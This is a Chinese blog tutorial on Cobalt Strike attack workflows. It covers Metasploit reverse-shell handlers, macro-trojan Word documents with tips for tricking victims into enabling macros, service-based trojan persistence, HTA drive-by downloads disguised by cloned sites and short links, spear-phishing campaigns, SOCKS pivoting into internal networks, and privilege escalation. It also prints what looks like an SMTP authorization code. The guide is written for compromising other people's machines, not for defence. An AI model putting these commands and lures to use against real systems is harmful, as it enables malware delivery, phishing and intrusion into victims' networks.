cs常用功能

0x01. cs结合msf反弹shell

在cs中可以设置添加会话,将与肉鸡的会话转发给msf,这样就可以利用msf中的功能对肉鸡攻击了

在kali中使用命令开启msf

msfconsole

image-20210118133057513

设置监听

 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
set lhost 192.168.18.40
set lprot 8882
run -j                            将监听挂到后台

image-20210118133351057

在cs客户端中新建一个监听器,ip和端口要和msf的保持一致

image-20210118133701748

上线一台机器然后添加会话

image-20210118133754828

image-20210118133814420

可以在msf中看到shell的反弹,但是很快会话就失败了

image-20210118134202905

通过background将会话转到后台 , 然后用msf的其他工具进行攻击

0x02. office宏payload应用

生成ms宏payload

image-20210118140624614

选择监听器,点击生成

image-20210118140718488

拷贝生成后的内容

image-20210118140746176

新建一个word文档,将拷贝的宏木马添加到当前的word文档中

先将宏的安全性降低

image-20210118142409581

工具 ---》 宏 ---》宏 ,输入好宏名和宏的位置后,点击创建

image-20210118142539225

将之前复制的宏木马粘贴到代码中

image-20210118142839474

然后保存,word文档,将文档发给别人

image-20210118143103345

当他点击启用宏的时候他的电脑就会上线了

image-20210118143208113

总结 : 对于新版本的office宏默认是打开的,但是会发出通知,只有当他点击启用宏后,这台主机才能上线,你

可以先告诉他,必须启用宏,要不然显示不出来内容,哈哈哈哈。宏木马和office版本没有关系。

0x03. 生成带服务的木马

默认木马服务器重启后,就不会再上线了,但是带服务的木马即使重启了服务器,还是会上线

Sc create test binpath=c:\test.exe start=auto displayname=test      将test.exe作为一个服务启动

Sc start test

Sc delete test

Sc top test

image-20210118140416775

这种马会自动提权到system

0x04. 信息收集

通过让对方访问网站达到信息收集的目的

生成url

image-20210118143821303

image-20210118143958186

image-20210118144025708

http://192.168.18.40:80/

可以通过https://bitly.com或者http://tool.chinaz.com/tools/dwz.aspx生成url短链接

image-20210118144213267

https://bit.ly/3oYmkub

当别人点击这个网站,你就可以在cs客户端中的应用信息中看到收集的信息了,貌似没有鸟用

image-20210118145531756

0x05. hta网页挂马

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,

就是一个独立的应用软件,与VBC++等程序语言所设计的软件界面没什么差别。

下例代码保存为xx.hta:

<html>
<head>
<title>Title of page</title>
</head>
<body>
This is my first homepage.
<b>This text is bold</b>
</body>
</html>

第一步:生成hta

image-20210118151230208

image-20210118153252107

image-20210118151528651

第二步、使用文件下载

image-20210118151646144

image-20210118151804518

点击开始之后,test.hta文件会自动传到cs下的uploads目录。

image-20210118152407057

复制生成的链接

http://192.168.18.40:80/download/file.ext          
也可以去短链接平台生成一个
https://bit.ly/38Vdfws                因为这个url很明显是个带木马的,所以我们可以进行克隆网站,进一步的伪装

第三步、克隆网站

image-20210118152518789

image-20210118152643265

肉鸡操作,用浏览器访问刚才生成的url

http://192.168.18.40/           用过短连接进一步伪装

然后页面弹出保存就保存,弹出运行就运行,打开cs的web日志可以看到键盘记录,貌似只能记录数字和abc

image-20210118154629296

0x06. 邮件钓鱼

image-20210118154815944

image-20210118155240856

收件人的邮箱地址,可以保存在一个记事本中,一行对应一个目标邮箱,邮件内容可以通过复制qq邮件内容

附件的话一般都是一个压缩包木马,绑定木马的那种,钓鱼地址可以填hta网页马

image-20210118155553583

image-20210118160206585

开启smtp服务的授权码       gpbmdyggygejdcge

image-20210118164006245

邮件钓鱼你想做的好的话,一般都是申请一个国外的邮箱地址,然后还挂个vpn

0x07. Socks代理应用

环境搭建:

win2003上线的机器

  • 192网段的,还有一张网卡是172的

win7

  • 172网段

默认攻击者是无法攻击172网段的其他机器的,但是如果将肉鸡设置成代理,这样攻击者就能间接的攻击172网段

的机器了,前提是上线的肉鸡有172这个网段的网卡,且能和这个网段的其他机器能够通信

第一步、设置代理端口

image-20210118175013060

image-20210118175044242

第二步、查看已搭建代理

image-20210118175258795

点击之后生成一行代码复制到msf里面运行就可以利用msf远程攻击那个不通的主机

setg Proxies socks4:192.168.18.40:5103

第三步、利用msf模块直接攻击

msfconsole
use auxiliary/scanner/portscan/tcp
set rhost 172.16.0.3                              之前不同的主机的ip
run

image-20210118215314124

然后就会扫描到在172网段下的其他机器了,还有一个使用方法是在kali的配置文件修改

然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器,端口为之前生成的随机端口

img

使用proxychains代理扫描内网主机 proxychains nmap -sP 172.10.1.0/24,目前Socks是用的最多的

内网渗透中先传一个cs木马,在cs中配置一个Socks代理,通过上线的肉鸡攻击内网

0x08. cs提权

image-20210118190246998

image-20210118190659306

image-20210118190720848

image-20210118190603159

提权成功,如果自带的提权没有成功的话,可以手动添加payload,

下载地址:https://github.com/rsmudge/Elevatekit

先下载提权payload

image-20210118191036489

导入提权payload

image-20210118191432051

image-20210118191615328

选择下载的提权payload

image-20210118191741222

image-20210118192126220

image-20210118192313841

0x09. 扫描网段

详情请见:

https://k8gege.org/Download/

https://github.com/k8gege/Aggressor

木马功能,鱼叉攻击,免杀,兼容性稳定,拓展模块,读密码,提权,内网渗透,与msf联动,socks代理直接攻

击内网

posted @ 2021-03-01 17:49  Mn猿  阅读(411)  评论(0编辑  收藏  举报